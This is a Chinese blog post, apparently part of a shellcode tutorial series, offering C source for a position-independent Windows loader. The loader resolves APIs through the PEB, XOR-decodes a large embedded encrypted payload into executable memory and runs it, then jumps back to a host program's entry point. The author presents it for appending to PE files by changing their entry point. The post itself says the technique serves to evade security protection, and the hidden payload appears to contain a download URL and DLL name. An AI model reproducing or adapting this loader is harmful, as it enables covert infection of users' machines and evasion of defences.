C语言实现shellcode通用框架一:文件解密执行

最新推荐文章于 2026-05-24 07:50:23 发布
原创 最新推荐文章于 2026-05-24 07:50:23 发布 · 767 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文介绍了一种利用壳代码技术,在PE文件中嵌入解密代码,通过修改入口点执行解密后的内容。代码示例展示了如何构造壳代码,动态获取API地址,并解密执行隐藏的shellcode。这种方法常用于绕过安全防护,实现代码隐蔽执行。

简介:

之前写的代码,开下源。相当于shellcode里面套了一段解密shellcode,可以贴在PE文件后面,改入口点,最后执行完成以后再跳回来。最主要的还是要学习一下,shellcode框架怎么写,怎么地址无关,怎么随心所欲的调自己想要的API。这个知道了,就可以随便写shellcode了,但是注意shellcode中字符串的初始化格式,都是以字符数组的格式保存,这样才能地址无关!!!!!下面看代码就行,希望对大家有所帮助。

#include <Windows.h>

FARPROC	_GetProcAddresss(HMODULE hMoudleBase);
int main()
{
	HMODULE h_kernel32 = NULL;
	__asm
	{
		mov eax, fs:[0x30] 
		mov eax, [eax + 0xc]     
		mov eax, [eax + 0x14]    
		mov eax, [eax]
		mov eax, [eax]
		mov eax, [eax + 0x10]
		mov h_kernel32, eax
	}

	typedef FARPROC (WINAPI *FN_GetProcAddress) (
		__in HMODULE hModule,
		__in LPCSTR lpProcName
		);

	FN_GetProcAddress fn_GetProcAddress;
	fn_GetProcAddress = (FN_GetProcAddress)_GetProcAddresss(h_kernel32);

	typedef LPVOID (WINAPI* FN_VirtualAlloc)(
		__in_opt LPVOID lpAddress,
		__in     SIZE_T dwSize,
		__in     DWORD flAllocationType,
		__in     DWORD flProtect
		);

	char strVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c','\x00'};
	FN_VirtualAlloc fn_VirtualAlloc = (FN_VirtualAlloc)fn_GetProcAddress(h_kernel32,strVirtualAlloc);

	typedef BOOL (WINAPI* FN_VirtualProtect)(
		__in  LPVOID lpAddress,
		__in  SIZE_T dwSize,
		__in  DWORD flNewProtect,
		__out PDWORD lpflOldProtect
		);

	char strVirtualProtect[] = {'V','i','r','t','u','a','l','P','r','o','t','e','c','t','\x00'};
	FN_VirtualProtect fn_VirtualProtect = (FN_VirtualProtect)fn_GetProcAddress(h_kernel32,strVirtualProtect);

	typedef BOOL (WINAPI* FN_VirtualFree)(
		__in LPVOID lpAddress,
		__in SIZE_T dwSize,
		__in DWORD dwFreeType
		);
	
	char strVirtualFree[] = {'V','i','r','t','u','a','l','F','r','e','e','\x00'};
	FN_VirtualFree fn_VirtualFree = (FN_VirtualFree)fn_GetProcAddress(h_kernel32,strVirtualFree);

	unsigned char hexData_1[2287] = {
		0xD4, 0xB9, 0x79, 0x54, 0x55, 0x55, 0x06, 0x00, 0x03, 0x02, 0x92, 0x11, 0x71, 0x41, 0x55, 0x55,
		0x55, 0x55, 0x31, 0xF4, 0x65, 0x55, 0x55, 0x55, 0xDE, 0x15, 0x59, 0xDE, 0x15, 0x41, 0xDE, 0x55,
		0xDE, 0x55, 0xDE, 0x15, 0x45, 0xDC, 0x11, 0x71, 0x41, 0xDE, 0x01, 0x71, 0x41, 0xBD, 0x5B, 0x5D,
		0x55, 0x55, 0xDE, 0xA5, 0xE5, 0x19, 0xDD, 0xD1, 0x71, 0xC9, 0x55, 0x55, 0x55, 0xDD, 0xD1, 0x71,
		0xF5, 0x55, 0x55, 0x55, 0xD8, 0xD1, 0x71, 0xC9, 0x55, 0x55, 0x55, 0x05, 0x07, 0x93, 0xD1, 0x71,
		0xF0, 0x55, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71, 0xF3, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71,
		0xF2, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xFC, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71,
		0xFF, 0x55, 0x55, 0x55, 0x37, 0x93, 0xD1, 0x71, 0xFE, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71,
		0xF9, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71, 0xF8, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71,
		0xFB, 0x55, 0x55, 0x55, 0x2C, 0x93, 0xD1, 0x71, 0xFA, 0x55, 0x55, 0x55, 0x14, 0x93, 0xD1, 0x71,
		0xE5, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83, 0xD8, 0x19, 0x71, 0x19, 0xDE, 0xBD, 0xE6, 0x30, 0x04,
		0xDC, 0xF9, 0x71, 0x7D, 0x54, 0x55, 0x55, 0x93, 0x11, 0x71, 0x05, 0x20, 0x93, 0x11, 0x71, 0x04,
		0x26, 0xDD, 0x09, 0x71, 0x07, 0x93, 0x11, 0x71, 0x06, 0x27, 0x93, 0x11, 0x71, 0x01, 0x66, 0x93,
		0x11, 0x71, 0x00, 0x67, 0x93, 0x11, 0x71, 0x03, 0x7B, 0x93, 0x11, 0x71, 0x02, 0x31, 0x93, 0x11,
		0x71, 0x0D, 0x39, 0x93, 0x11, 0x71, 0x0C, 0x39, 0x93, 0x11, 0x71, 0x0F, 0x55, 0xAA, 0x80, 0xD8,
		0xC1, 0x71, 0xC5, 0x55, 0x55, 0x55, 0x07, 0x93, 0xD1, 0x71, 0xC1, 0x55, 0x55, 0x55, 0x22, 0x93,
		0xD1, 0x71, 0xC0, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71, 0xC3, 0x55, 0x55, 0x55, 0x3B, 0x93,
		0xD1, 0x71, 0xC2, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71, 0xCD, 0x55, 0x55, 0x55, 0x3B, 0xDD,
		0xC9, 0x71, 0xCC, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xCF, 0x55, 0x55, 0x55, 0x21, 0x93, 0xD1,
		0x71, 0xCE, 0x55, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71, 0xC9, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1,
		0x71, 0xC8, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0xCB, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1,
		0x71, 0xCA, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x80, 0xDE, 0xAD, 0xD8, 0xD1, 0x71, 0xF9, 0x55, 0x55,
		0x55, 0x05, 0x02, 0x93, 0xD1, 0x71, 0xE1, 0x55, 0x55, 0x55, 0x1C, 0x93, 0xD1, 0x71, 0xE0, 0x55,
		0x55, 0x55, 0x3B, 0x93, 0xD1, 0x71, 0xE3, 0x55, 0x55, 0x55, 0x21, 0xDD, 0xC9, 0x71, 0xE2, 0x55,
		0x55, 0x55, 0x93, 0xD1, 0x71, 0xED, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71, 0xEC, 0x55, 0x55,
		0x55, 0x3B, 0xDD, 0xC9, 0x71, 0xEF, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xEE, 0x55, 0x55, 0x55,
		0x21, 0x93, 0xD1, 0x71, 0xE9, 0x55, 0x55, 0x55, 0x1A, 0x93, 0xD1, 0x71, 0xE8, 0x55, 0x55, 0x55,
		0x25, 0xDD, 0xC9, 0x71, 0xEB, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xEA, 0x55, 0x55, 0x55, 0x3B,
		0x93, 0xD1, 0x71, 0x95, 0x55, 0x55, 0x55, 0x14, 0x93, 0xD1, 0x71, 0x94, 0x55, 0x55, 0x55, 0x55,
		0xAA, 0x83, 0xDC, 0xD1, 0x71, 0xDD, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xE9, 0x55, 0x55, 0x55,
		0x1C, 0x93, 0xD1, 0x71, 0xE8, 0x55, 0x55, 0x55, 0x3B, 0xD8, 0xD9, 0x71, 0xE9, 0x55, 0x55, 0x55,
		0x04, 0x02, 0x93, 0xD1, 0x71, 0x93, 0x55, 0x55, 0x55, 0x21, 0xDD, 0xC9, 0x71, 0x92, 0x55, 0x55,
		0x55, 0x93, 0xD1, 0x71, 0x9D, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71, 0x9C, 0x55, 0x55, 0x55,
		0x3B, 0xDD, 0xC9, 0x71, 0x9F, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x9E, 0x55, 0x55, 0x55, 0x21,
		0x93, 0xD1, 0x71, 0x99, 0x55, 0x55, 0x55, 0x1A, 0x93, 0xD1, 0x71, 0x98, 0x55, 0x55, 0x55, 0x25,
		0xDD, 0xC9, 0x71, 0x9B, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x9A, 0x55, 0x55, 0x55, 0x3B, 0x93,
		0xD1, 0x71, 0x85, 0x55, 0x55, 0x55, 0x00, 0x93, 0xD1, 0x71, 0x84, 0x55, 0x55, 0x55, 0x27, 0x93,
		0xD1, 0x71, 0x87, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0x86, 0x55, 0x55, 0x55, 0x14, 0x93,
		0xD1, 0x71, 0x81, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83, 0xD8, 0x01, 0x71, 0x25, 0xDC, 0xD1, 0x71,
		0xD9, 0x55, 0x55, 0x55, 0xDE, 0x11, 0x71, 0x41, 0x07, 0x05, 0x93, 0x11, 0x71, 0x2D, 0x16, 0x93,
		0x11, 0x71, 0x2C, 0x27, 0xDD, 0x09, 0x71, 0x2F, 0x93, 0x11, 0x71, 0x2E, 0x34, 0x93, 0x11, 0x71,
		0x29, 0x21, 0xDD, 0x09, 0x71, 0x28, 0x93, 0x11, 0x71, 0x2B, 0x13, 0x93, 0x11, 0x71, 0x2A, 0x3C,
		0x93, 0xD1, 0x71, 0xD5, 0x55, 0x55, 0x55, 0x39, 0xDD, 0xC9, 0x71, 0xD4, 0x55, 0x55, 0x55, 0x93,
		0xD1, 0x71, 0xD7, 0x55, 0x55, 0x55, 0x14, 0x93, 0xD1, 0x71, 0xD6, 0x55, 0x55, 0x55, 0x55, 0xAA,
		0x83, 0xDE, 0x01, 0x71, 0x41, 0xD8, 0x19, 0x71, 0x15, 0x04, 0x07, 0xDC, 0xD1, 0x71, 0x69, 0x54,
		0x55, 0x55, 0x93, 0x11, 0x71, 0x1D, 0x02, 0x93, 0x11, 0x71, 0x1C, 0x27, 0x93, 0x11, 0x71, 0x1F,
		0x3C, 0x93, 0x11, 0x71, 0x1E, 0x21, 0xDD, 0x09, 0x71, 0x19, 0x93, 0x11, 0x71, 0x18, 0x13, 0x93,
		0x11, 0x71, 0x1B, 0x3C, 0x93, 0x11, 0x71, 0x1A, 0x39, 0xDD, 0x09, 0x71, 0x05, 0x93, 0x11, 0x71,
		0x04, 0x55, 0xAA, 0x83, 0xDE, 0x19, 0x71, 0x41, 0xDC, 0xD1, 0x71, 0x75, 0x54, 0x55, 0x55, 0xD8,
		0x11, 0x71, 0x29, 0x05, 0x04, 0x93, 0xD1, 0x71, 0xD1, 0x55, 0x55, 0x55, 0x16, 0x93, 0xD1, 0x71,
		0xD0, 0x55, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0xD3, 0x55, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71,
		0xD2, 0x55, 0x55, 0x55, 0x26, 0xDD, 0xC9, 0x71, 0xDD, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xDC,
		0x55, 0x55, 0x55, 0x1D, 0x93, 0xD1, 0x71, 0xDF, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71, 0xDE,
		0x55, 0x55, 0x55, 0x3B, 0x93, 0xD1, 0x71, 0xD9, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xD8,
		0x55, 0x55, 0x55, 0x39, 0xDD, 0xC9, 0x71, 0xDB, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xDA, 0x55,
		0x55, 0x55, 0x55, 0xAA, 0x83, 0xDC, 0xD1, 0x71, 0x79, 0x54, 0x55, 0x55, 0x93, 0x11, 0x71, 0x0D,
		0x38, 0x93, 0x11, 0x71, 0x0C, 0x26, 0x93, 0x11, 0x71, 0x0F, 0x23, 0x93, 0x11, 0x71, 0x0E, 0x36,
		0x93, 0x11, 0x71, 0x09, 0x27, 0x93, 0x11, 0x71, 0x08, 0x21, 0x93, 0x11, 0x71, 0x0B, 0x7B, 0x93,
		0x11, 0x71, 0x0A, 0x31, 0x93, 0x11, 0x71, 0x35, 0x39, 0xD8, 0x01, 0x71, 0x0D, 0x07, 0x93, 0x11,
		0x71, 0x30, 0x39, 0x93, 0x11, 0x71, 0x33, 0x55, 0xAA, 0x80, 0xDE, 0xBD, 0xD8, 0x11, 0x71, 0x71,
		0x05, 0x00, 0x93, 0x11, 0x71, 0x79, 0x38, 0x93, 0x11, 0x71, 0x78, 0x34, 0x93, 0x11, 0x71, 0x7B,
		0x39, 0x93, 0x11, 0x71, 0x7A, 0x39, 0x93, 0x11, 0x71, 0x65, 0x3A, 0x93, 0x11, 0x71, 0x64, 0x36,
		0x93, 0x11, 0x71, 0x67, 0x55, 0xAA, 0x83, 0xD8, 0x19, 0x71, 0x79, 0x04, 0x00, 0xDC, 0x11, 0x71,
		0x7D, 0x93, 0x11, 0x71, 0x61, 0x38, 0xDD, 0x09, 0x71, 0x60, 0x93, 0x11, 0x71, 0x63, 0x38, 0x93,
		0x11, 0x71, 0x62, 0x26, 0xDD, 0x09, 0x71, 0x6D, 0x93, 0x11, 0x71, 0x6C, 0x21, 0x93, 0x11, 0x71,
		0x6F, 0x55, 0xAA, 0x83, 0xD8, 0x01, 0x71, 0x4D, 0x07, 0x00, 0xDC, 0xD1, 0x71, 0x65, 0x54, 0x55,
		0x55, 0x93, 0x11, 0x71, 0x75, 0x33, 0x93, 0x11, 0x71, 0x74, 0x27, 0xDD, 0x09, 0x71, 0x77, 0xDD,
		0x09, 0x71, 0x76, 0x93, 0x11, 0x71, 0x71, 0x55, 0xAA, 0x83, 0xDC, 0xD1, 0x71, 0x6D, 0x54, 0x55,
		0x55, 0xD8, 0xD1, 0x71, 0x85, 0x55, 0x55, 0x55, 0x05, 0x02, 0x93, 0xD1, 0x71, 0x8D, 0x55, 0x55,
		0x55, 0x1C, 0x93, 0xD1, 0x71, 0x8C, 0x55, 0x55, 0x55, 0x3B, 0x93, 0xD1, 0x71, 0x8F, 0x55, 0x55,
		0x55, 0x21, 0xDD, 0xC9, 0x71, 0x8E, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x89, 0x55, 0x55, 0x55,
		0x27, 0x93, 0xD1, 0x71, 0x88, 0x55, 0x55, 0x55, 0x3B, 0xDD, 0xC9, 0x71, 0x8B, 0x55, 0x55, 0x55,
		0x93, 0xD1, 0x71, 0x8A, 0x55, 0x55, 0x55, 0x21, 0x93, 0xD1, 0x71, 0xB5, 0x55, 0x55, 0x55, 0x07,
		0xDD, 0xC9, 0x71, 0xB4, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xB7, 0x55, 0x55, 0x55, 0x34, 0x93,
		0xD1, 0x71, 0xB6, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xB1, 0x55, 0x55, 0x55, 0x13, 0x93,
		0xD1, 0x71, 0xB0, 0x55, 0x55, 0x55, 0x3C, 0x93, 0xD1, 0x71, 0xB3, 0x55, 0x55, 0x55, 0x39, 0xDD,
		0xC9, 0x71, 0xB2, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xBD, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83,
		0xDE, 0xBD, 0x93, 0xD1, 0x71, 0xB1, 0x55, 0x55, 0x55, 0x1C, 0x93, 0xD1, 0x71, 0xB0, 0x55, 0x55,
		0x55, 0x3B, 0x93, 0xD1, 0x71, 0xB3, 0x55, 0x55, 0x55, 0x21, 0xDD, 0xC9, 0x71, 0xB2, 0x55, 0x55,
		0x55, 0x93, 0xD1, 0x71, 0xBD, 0x55, 0x55, 0x55, 0x27, 0x93, 0xD1, 0x71, 0xBC, 0x55, 0x55, 0x55,
		0x3B, 0xDD, 0xC9, 0x71, 0xBF, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xBE, 0x55, 0x55, 0x55, 0x21,
		0x93, 0xD1, 0x71, 0xB9, 0x55, 0x55, 0x55, 0x16, 0x93, 0xD1, 0x71, 0xB8, 0x55, 0x55, 0x55, 0x39,
		0x93, 0xD1, 0x71, 0xBB, 0x55, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71, 0xBA, 0x55, 0x55, 0x55, 0x26,
		0xDD, 0xC9, 0x71, 0xA5, 0x55, 0x55, 0x55, 0x93, 0xD1, 0x71, 0xA4, 0x55, 0x55, 0x55, 0x1D, 0x93,
		0xD1, 0x71, 0xA7, 0x55, 0x55, 0x55, 0x34, 0x93, 0xD1, 0x71, 0xA6, 0x55, 0x55, 0x55, 0x3B, 0x93,
		0xD1, 0x71, 0xA1, 0x55, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0xA0, 0x55, 0x55, 0x55, 0x39, 0xDD,
		0xC9, 0x71, 0xA3, 0x55, 0x55, 0x55, 0xD8, 0xD9, 0x71, 0xB1, 0x55, 0x55, 0x55, 0x04, 0x02, 0x93,
		0xD1, 0x71, 0xAA, 0x55, 0x55, 0x55, 0x55, 0xAA, 0x83, 0x3F, 0x55, 0x3F, 0x55, 0x3F, 0x55, 0x3F,
		0x55, 0xD8, 0x01, 0x71, 0x21, 0x07, 0xDC, 0xD1, 0x71, 0x65, 0x54, 0x55, 0x55, 0x93, 0x11, 0x71,
		0x2D, 0x07, 0x93, 0x11, 0x71, 0x2C, 0x3A, 0x93, 0x11, 0x71, 0x2F, 0x3A, 0x93, 0x11, 0x71, 0x2E,
		0x3E, 0x93, 0x11, 0x71, 0x29, 0x1C, 0x93, 0x11, 0x71, 0x28, 0x10, 0x93, 0x11, 0x71, 0x2B, 0x7A,
		0x93, 0x11, 0x71, 0x2A, 0x64, 0x93, 0xD1, 0x71, 0xD5, 0x55, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71,
		0xD4, 0x55, 0x55, 0x55, 0x65, 0x93, 0xD1, 0x71, 0xD7, 0x55, 0x55, 0x55, 0x55, 0xAA, 0xC1, 0x71,
		0xC9, 0x55, 0x55, 0x55, 0xDE, 0xAD, 0x93, 0x11, 0x71, 0x61, 0x21, 0xDD, 0x09, 0x71, 0x60, 0x93,
		0x11, 0x71, 0x63, 0x26, 0x93, 0x11, 0x71, 0x62, 0x21, 0x93, 0x11, 0x71, 0x6D, 0x0A, 0x93, 0x11,
		0x71, 0x6C, 0x64, 0x93, 0x11, 0x71, 0x6F, 0x7B, 0x93, 0x11, 0x71, 0x6E, 0x31, 0x93, 0x11, 0x71,
		0x69, 0x39, 0x93, 0x11, 0x71, 0x68, 0x39, 0x93, 0x11, 0x71, 0x6B, 0x55, 0xD0, 0xAA, 0x5A, 0xD1,
		0xA7, 0x54, 0x55, 0x55, 0x3F, 0x55, 0x3D, 0x55, 0x55, 0x55, 0x51, 0xE5, 0x3D, 0x3F, 0x55, 0xDD,
		0xD1, 0x71, 0x51, 0x54, 0x55, 0x55, 0xDD, 0xD1, 0x71, 0x45, 0x54, 0x55, 0x55, 0x3F, 0x55, 0xD8,
		0xD1, 0x71, 0x5D, 0x54, 0x55, 0x55, 0x05, 0x02, 0x93, 0xD1, 0x71, 0x44, 0x54, 0x55, 0x55, 0x21,
		0x93, 0xD1, 0x71, 0x47, 0x54, 0x55, 0x55, 0x21, 0x93, 0xD1, 0x71, 0x46, 0x54, 0x55, 0x55, 0x25,
		0x93, 0xD1, 0x71, 0x41, 0x54, 0x55, 0x55, 0x6F, 0x93, 0xD1, 0x71, 0x40, 0x54, 0x55, 0x55, 0x7A,
		0x93, 0xD1, 0x71, 0x43, 0x54, 0x55, 0x55, 0x7A, 0x93, 0xD1, 0x71, 0x42, 0x54, 0x55, 0x55, 0x22,
		0x93, 0xD1, 0x71, 0x4D, 0x54, 0x55, 0x55, 0x22, 0x93, 0xD1, 0x71, 0x4C, 0x54, 0x55, 0x55, 0x22,
		0x93, 0xD1, 0x71, 0x4F, 0x54, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71, 0x4E, 0x54, 0x55, 0x55, 0x26,
		0xDD, 0xC9, 0x71, 0x48, 0x54, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x4B, 0x54, 0x55, 0x55, 0x3B, 0x93,
		0xD1, 0x71, 0x4A, 0x54, 0x55, 0x55, 0x24, 0x93, 0xD1, 0x71, 0x75, 0x54, 0x55, 0x55, 0x3C, 0x93,
		0xD1, 0x71, 0x74, 0x54, 0x55, 0x55, 0x37, 0x93, 0xD1, 0x71, 0x77, 0x54, 0x55, 0x55, 0x37, 0x93,
		0xD1, 0x71, 0x76, 0x54, 0x55, 0x55, 0x7B, 0x93, 0xD1, 0x71, 0x71, 0x54, 0x55, 0x55, 0x36, 0x93,
		0xD1, 0x71, 0x70, 0x54, 0x55, 0x55, 0x3A, 0x93, 0xD1, 0x71, 0x73, 0x54, 0x55, 0x55, 0x38, 0x93,
		0xD1, 0x71, 0x72, 0x54, 0x55, 0x55, 0x7A, 0x93, 0xD1, 0x71, 0x7D, 0x54, 0x55, 0x55, 0x21, 0xDD,
		0xC9, 0x71, 0x7C, 0x54, 0x55, 0x55, 0x93, 0xD1, 0x71, 0x7F, 0x54, 0x55, 0x55, 0x26, 0x93, 0xD1,
		0x71, 0x7E, 0x54, 0x55, 0x55, 0x21, 0x93, 0xD1, 0x71, 0x79, 0x54, 0x55, 0x55, 0x7B, 0x93, 0xD1,
		0x71, 0x78, 0x54, 0x55, 0x55, 0x31, 0x93, 0xD1, 0x71, 0x7B, 0x54, 0x55, 0x55, 0x39, 0x93, 0xD1,
		0x71, 0x7A, 0x54, 0x55, 0x55, 0x39, 0x93, 0xD1, 0x71, 0x65, 0x54, 0x55, 0x55, 0x55, 0xAA, 0xC1,
		0x71, 0xF1, 0x55, 0x55, 0x55, 0xDE, 0x8D, 0xD0, 0x8E, 0x5A, 0xD1, 0xEA, 0x55, 0x55, 0x55, 0x3D,
		0x55, 0x55, 0x54, 0x55, 0xAA, 0x01, 0x71, 0x71, 0x3D, 0x55, 0x55, 0x54, 0x55, 0x3F, 0x55, 0x05,
		0xDC, 0x11, 0x71, 0x65, 0xAA, 0xC1, 0x71, 0x6D, 0x54, 0x55, 0x55, 0xD6, 0x91, 0x45, 0x3F, 0x55,
		0x3D, 0xD5, 0x55, 0x55, 0x55, 0x3F, 0x57, 0x3F, 0x55, 0x3F, 0x55, 0x3D, 0x55, 0x55, 0x55, 0x15,
		0xD8, 0x19, 0x71, 0x19, 0x04, 0x92, 0xD1, 0x71, 0xFD, 0x55, 0x55, 0x55, 0x54, 0x55, 0x55, 0x55,
		0x92, 0xD1, 0x71, 0x19, 0x54, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0xAA, 0xC1, 0x71, 0x05, 0x54,
		0x55, 0x55, 0xDC, 0xD1, 0x71, 0xDD, 0x55, 0x55, 0x55, 0xD0, 0x95, 0x21, 0x17, 0xDE, 0x11, 0x71,
		0x75, 0xD8, 0xC1, 0x71, 0xD9, 0x55, 0x55, 0x55, 0x07, 0x3D, 0x55, 0x55, 0x54, 0x55, 0x05, 0x06,
		0xAA, 0x80, 0xDE, 0xC1, 0x71, 0xD9, 0x55, 0x55, 0x55, 0xDE, 0x11, 0x71, 0x75, 0x3F, 0x55, 0xD8,
		0xD9, 0x71, 0x61, 0x54, 0x55, 0x55, 0x04, 0xDE, 0xD9, 0x71, 0xC5, 0x55, 0x55, 0x55, 0x07, 0x05,
		0x04, 0xAA, 0xC1, 0x71, 0x61, 0x54, 0x55, 0x55, 0xDE, 0xD1, 0x71, 0xDD, 0x55, 0x55, 0x55, 0x05,
		0xAA, 0xC1, 0x71, 0x65, 0x54, 0x55, 0x55, 0xDE, 0x01, 0x71, 0x75, 0x07, 0xAA, 0xC1, 0x71, 0x69,
		0x54, 0x55, 0x55, 0xD6, 0x91, 0x51, 0x06, 0xAA, 0xC1, 0x71, 0x75, 0x54, 0x55, 0x55, 0x02, 0xAA,
		0xC1, 0x71, 0x75, 0x54, 0x55, 0x55, 0xD8, 0x11, 0x71, 0x61, 0x05, 0xAA, 0xC1, 0x71, 0x7D, 0x54,
		0x55, 0x55, 0xD8, 0x19, 0x71, 0x45, 0x04, 0x05, 0x93, 0x11, 0x71, 0x4D, 0x27, 0x93, 0x11, 0x71,
		0x4C, 0x20, 0x93, 0x11, 0x71, 0x4F, 0x3B, 0x93, 0x11, 0x71, 0x4E, 0x55, 0xAA, 0x83, 0xAA, 0x85,
		0x0A, 0x0B, 0x08, 0x66, 0x95, 0x0E, 0xD4, 0x91, 0x79, 0x54, 0x55, 0x55, 0x96, 0x99, 0x99, 0x99,
		0x04, 0xDE, 0x17, 0x69, 0x56, 0x97, 0xD6, 0x2D, 0x29, 0x55, 0x20, 0x51, 0x66, 0x95, 0x0C, 0x96,
		0xDE, 0x1D, 0x2D, 0xD0, 0x9C, 0x21, 0xA0, 0xDE, 0x11, 0x44, 0x49, 0x06, 0xDE, 0x09, 0x44, 0x4D,
		0x00, 0xDE, 0x39, 0x44, 0x71, 0x03, 0x02, 0xDE, 0x29, 0x44, 0x75, 0x66, 0xA3, 0x56, 0xAF, 0x56,
		0xBF, 0x56, 0x97, 0xDC, 0x21, 0x71, 0x45, 0x1E, 0xDE, 0x59, 0xE2, 0x56, 0x9F, 0xD5, 0x6C, 0x12,
		0x20, 0x1B, 0xD5, 0x2C, 0x54, 0x30, 0x20, 0x1D, 0xD5, 0x2C, 0x57, 0x21, 0x20, 0x17, 0xD5, 0x2C,
		0x56, 0x05, 0x20, 0x69, 0xD5, 0x2C, 0x51, 0x27, 0x20, 0x63, 0xD5, 0x2C, 0x50, 0x3A, 0x20, 0x65,
		0xD5, 0x2C, 0x53, 0x36, 0x20, 0x7F, 0xD5, 0x2C, 0x52, 0x14, 0x20, 0x71, 0xD5, 0x2C, 0x5D, 0x31,
		0x20, 0x4B, 0xD5, 0x2C, 0x5C, 0x31, 0x20, 0x4D, 0xD5, 0x2C, 0x5F, 0x27, 0x20, 0x47, 0xD5, 0x2C,
		0x5E, 0x30, 0x20, 0x59, 0xD5, 0x2C, 0x59, 0x26, 0x20, 0x53, 0xD5, 0x2C, 0x58, 0x26, 0x21, 0x5A,
		0x13, 0x6E, 0xA6, 0x23, 0xF6, 0xDE, 0x11, 0x71, 0x45, 0x0A, 0x0B, 0x08, 0x0E, 0x0C, 0x96, 0x5A,
		0xE2, 0x19, 0x20, 0x55, 0xDE, 0x51, 0xDD, 0x0A, 0x0B, 0x08, 0x56, 0x97, 0x0E, 0x0C, 0x96 
	};

	
	unsigned char *hexData_2 = (unsigned char*)fn_VirtualAlloc(NULL, 3 * 1024, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	//unsigned char hexData_2[sizeof(hexData_1)];
	DWORD pold;
	fn_VirtualProtect(hexData_2, 3 * 1024, PAGE_EXECUTE_READWRITE, &pold);
	for (int i =0;i<sizeof(hexData_1);i++)
	{
		hexData_2[i] = hexData_1[i] ^ 0x55;
	}
	__asm
	{
		mov eax,hexData_2
		call eax
	}
	fn_VirtualFree(hexData_2,3 * 1024,MEM_RELEASE);
	__asm
	{
		mov eax,0x11111111
		jmp eax
	}
	return 0;
}

FARPROC	_GetProcAddresss(HMODULE hMoudleBase)
{
	PIMAGE_DOS_HEADER lpDosHeader= (PIMAGE_DOS_HEADER)hMoudleBase;
	PIMAGE_NT_HEADERS32 lpNtHeadr = (PIMAGE_NT_HEADERS32)((DWORD)hMoudleBase + lpDosHeader->e_lfanew);
	if(!lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
		return NULL;
	if(!lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)
		return NULL;

	PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)(((DWORD)hMoudleBase + (DWORD)lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress));
	PDWORD lpdwFunName = (PDWORD)((DWORD)hMoudleBase + (DWORD)lpExports->AddressOfNames);
	PWORD lpdwOrd = (PWORD)((DWORD)hMoudleBase + (DWORD)lpExports->AddressOfNameOrdinals);
	PDWORD lpdwFunAddr = (PDWORD)((DWORD)hMoudleBase + (DWORD)lpExports->AddressOfFunctions);

	DWORD dwLoop = 0;
	FARPROC pRet = NULL;
	for(; dwLoop <= lpExports->NumberOfNames -1; dwLoop++)
	{
		char *pFunName = (char*)lpdwFunName[dwLoop] + (DWORD)hMoudleBase;
		if(pFunName[0] == 'G'  &&
			pFunName[1] == 'e'  &&
			pFunName[2] == 't'  &&
			pFunName[3] == 'P'  &&
			pFunName[4] == 'r'  &&
			pFunName[5] == 'o'  &&
			pFunName[6] == 'c'  &&
			pFunName[7] == 'A'  &&
			pFunName[8] == 'd'  &&
			pFunName[9] == 'd'  &&
			pFunName[10] == 'r' &&
			pFunName[11] == 'e' &&
			pFunName[12] == 's' &&
			pFunName[13] == 's' )
		{
			pRet = (FARPROC)(lpdwFunAddr[lpdwOrd[dwLoop]] + (DWORD)hMoudleBase);
			break;
		}
	}
	return pRet;
}

第10章 shellcode实战:16 实战:文件shellcode
李小咖·网安技术库
